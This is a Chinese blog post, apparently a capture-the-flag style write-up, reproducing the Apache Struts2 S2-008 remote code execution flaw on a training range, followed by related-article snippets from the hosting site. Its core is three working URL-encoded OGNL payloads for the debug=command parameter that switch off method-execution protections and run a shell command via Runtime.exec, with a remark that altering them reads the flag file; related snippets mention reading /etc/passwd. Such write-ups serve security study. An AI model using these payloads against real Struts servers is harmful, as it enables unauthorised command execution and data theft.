0x24.Apache Struts2远程代码执行漏洞(S2-008)复现

最新推荐文章于 2024-07-14 19:10:03 发布
最新推荐文章于 2024-07-14 19:10:03 发布
阅读量645 收藏
点赞数
分类专栏: 墨者学院 文章标签: 墨者学院 S2-008
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31679787/article/details/102609366
版权

s2-008:1.Cookie 拦截器错误配置可造成 OGNL 表达式执行;2.开启 devMode 模式后会有多个调试接口能够直接查看对象信息或直接执行命令;

构造poc验证漏洞;

poc:

?debug=command&expression=

%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c%23a%3d@java.lang.Runtime@getRuntime%28%29.exec%28%22ls%22%29.getInputStream%28%29%2c%23b%3dnew java.io.InputStreamReader%28%23a%29%2c%23c%3dnew java.io.BufferedReader%28%23b%29%2c%23d%3dnew char%5b500%5d%2c%23c.read%28%23d%29%2c%23genxor%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2c%23genxor.println%28%23d%29%2c%23genxor.flush%28%29%2c%23genxor.close%28%29

修改poc即可查看key文件;

其余有效poc;

?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27ls%27%29.getInputStream%28%29%29)

 

?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22ls%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()

 

漏洞详情:

https://github.com/vulhub/vulhub/tree/master/struts2/s2-008

半情调
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
在线靶场-墨者-命令执行2星-Apache Struts2远程代码执行漏洞(S2-008)复现
weixin_42079912的博客
08-09 382
S2-008漏洞原理:为了防止攻击者在参数中调用任意方法,标志xwork.MethodAccessor.denyMethodExecution被设置为true,并且SecurityMemberAccess字段默认allowStaticMethodAccess设置为false。 打开靶场网页,等网页加载完。如果没有加载完(靶场环境可能没有完全部署好),可能会影响工具检测结果。 方法一:Struts...
0x19.第十九课 MetaSploit对cve-2019-0708的漏洞攻击复现.pdf
06-24
漏洞允许未经身份验证的攻击者通过特制的数据包利用此漏洞实现远程代码执行,从而控制受影响的系统。由于其潜在的危害性,微软在2019年5月发布了紧急更新,并强烈建议所有用户尽快打上补丁。MetaSploit是一款广泛...
[CVE-2021-31805]Apache Struts2远程代码执行漏洞分析
whoami
04-14 380
一、软件背景 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。 二、漏洞版本 =< 2.5.26 三、漏洞分析 3.1.简述: 2020年,Apache Struts 发布了由Alvaro Munoz 和 Masato
墨者学院-Apache Struts2远程代码执行漏洞(S2-009)复现
JimWu的博客
09-04 1530
Apache Struts2远程代码执行漏洞(S2-009)复现 难易程度:★★ 题目类型:命令执行 使用工具:burpsuite、kali 漏洞原理:允许恶意用户绕过ParametersInterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。 1.打开靶场,了解S2-009漏洞原理 2.构造poc,执行命令ls,查看文件。...
Struts2远程代码执行漏洞
杨文学的专栏
03-18 3417
Struts2远程代码执行漏洞 本文摘自:http://www.oschina.net/news/74386/struts-2-cve-2016-4438 今年4月份,Apache Struts 2之上发现的S2-033远程代码执行漏洞,以迅雷不及掩耳之势席卷而来。其利用代码很快就在短时间内迅速传播。而且官方针对这个高危漏洞的修复方案还是无效的。
Apache Struts Showcase App 2.0.0 到 2.3.13(在 2.3.14.3 之前的 Struts 2 中使用)远程代码执行漏洞(CVE-2013-1965)
最新发布
Flag少侠的博客
07-14 9330
打开靶场可以看到有一个输入框,尝试输入一些值提交值作为 name 参数拼接在 URL 后面如果不输入参数直接提交则会得到当前网页的完全路径复制路径打开 K8 工具工具下载pwd=6666使用 S2-016 获取信息成功执行命令获取 flagt=N7T8工具下载https://pan.baidu.com/s/1gAV9uzWZgmC3ojKNeKAjsQ?pwd=6666。
windows无法连接到打印机SHA-2代码签名补丁win7修复工具打印机连接错误0x0004005.rar
12-16
在使用Windows操作系统时,尤其是Windows 7或更早版本,可能会遇到“无法连接到打印机”的问题,这种情况通常伴随着错误代码0x00004005。此问题的根源可能涉及多种因素,包括系统兼容性、驱动程序不兼容、网络连接...
毕业设计企业网站源码-s2-052-reproducing:s2-052-再现
06-06
S2-052(CVE-2017-9805)远程代码执行漏洞 0x00 漏洞描述 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。 Struts2是一个基于MVC设计模式的...
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -...
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apache.struts/struts2-spring-plugin/2.3.32
Apache Struts2远程代码执行漏洞(S2-001)复现
m0_58606546的博客
01-14 2443
0x01 漏洞概述 1、漏洞名称 漏洞名称:Struts Remote Code Exploit 漏洞编号:Struts2-001 漏洞类型:Remote Code Execution 2、漏洞原理 Struts2 是流行和成熟的基于 MVC 设计模式的 Web 应用程序框架。 Struts2 不只是 Struts1 下一个版本,它是一个完全重写的 Struts 架构。Struts2 的标签中使用的是OGNL表达式,OGNL 是 Object Graphic Navigation Language(
墨者Apache Struts2远程代码执行漏洞(S2-008)复现题解
zr1213159840的博客
01-15 726
我们先查询一下这个漏洞的相关信息,链接如下: https://github.com/vulhub/vulhub/blob/master/struts2/s2-008/README.zh-cn.md 可以发现是直接在url后面添加相应的poc就会被执行,上面链接提供的不太行,主要似乎是弹出计算器的,我们使用如下的poc,由于这类题目的key都是在key.txt中,我们直接上手拿到key吧,也不用ls一步步看了。如果需要的话,也可替换相应的cat /key.txt命令为ls查看。 debug=command&a
关于 Apache Struts 2 存在远程代码执行漏 洞的安全公告
weixin_48421613的博客
04-13 3622
2022 年 4 月 12 日,Apache 官方公布 S2-062 远程代码执 行漏洞安全公告,漏洞编号为 CVE-2021-31805。 一、漏洞描述 Apache Struts 是一个免费的开源 MVC 框架,用于创建 优雅的现代 Java Web 应用程序。它支持约定优于配置,可使 用插件架构进行扩展,并附带支持 REST、AJAX 和 JSON 的插 件。 由于对 CVE-2020-17530(S2-061)的修复不完整,导致输 入验证不正确。如果开发人员使用 %{…}语法应用强制 OGNL 解析
Apache Struts2远程代码执行漏洞(S2-005)
时生
10-12 2011
用工具扫一下利用
Apache Struts2远程代码执行漏洞(S2-008)复现总结
qq_45746681的博客
10-07 1657
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、漏洞原理2.复现 前言 记录并复现相关struts漏洞,加深理解 一、漏洞原理 主要是利用对传入参数没有严格限制,导致多个地方可以执行恶意代码,传入?debug=command&expression=即可执行OGNL表达式 2.复现 访问墨者学院strut2-008靶机 构造poc,执行命令ls,查看文件。 ?debug=command&expression=%23context%5B%22xwork
Struts2远程代码执行漏洞(CVE-2020-17530) 复现及排查
dayouzi的博客
08-15 1319
Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。CVE-2020-17530是对CVE-2019-0230的绕过,Struts2官方对CVE-2019-0230的修复方式是加强OGNL表达式沙盒,而CVE-2020-17530绕过了该沙盒。在特定的环境下,远程攻击者通过构造恶意的OGNL表达式,可造成任意代码执行
Struts2 远程代码执行漏洞S2-001分析
st3pby的博客
01-05 871
首先来了解 OGNL 表达式,OGNL(Object Graphic Navigatino Language)的中文全称为“对象图导航语言”,是应用于Java中的一个开源的功能强大的表达式语言(Expression Language),它被集成在Struts2等框架中,通过简单一致的表达式语法,可以存取对象的任何属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。OGNL进行对象存取操作的API在Ognl.java文件中,分别是getValue、setValue两个方法。
MS06-055漏洞分析:远程代码执行与HeapSpray技术
漏洞可导致远程代码执行,影响范围包括Windows 2000 SP4、Windows XP SP1/SP2以及Windows Server 2003,其中在Windows Server 2003 SP1上的影响级别较低。漏洞利用通常通过覆盖返回地址并结合JavaScript的HeapSpray...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值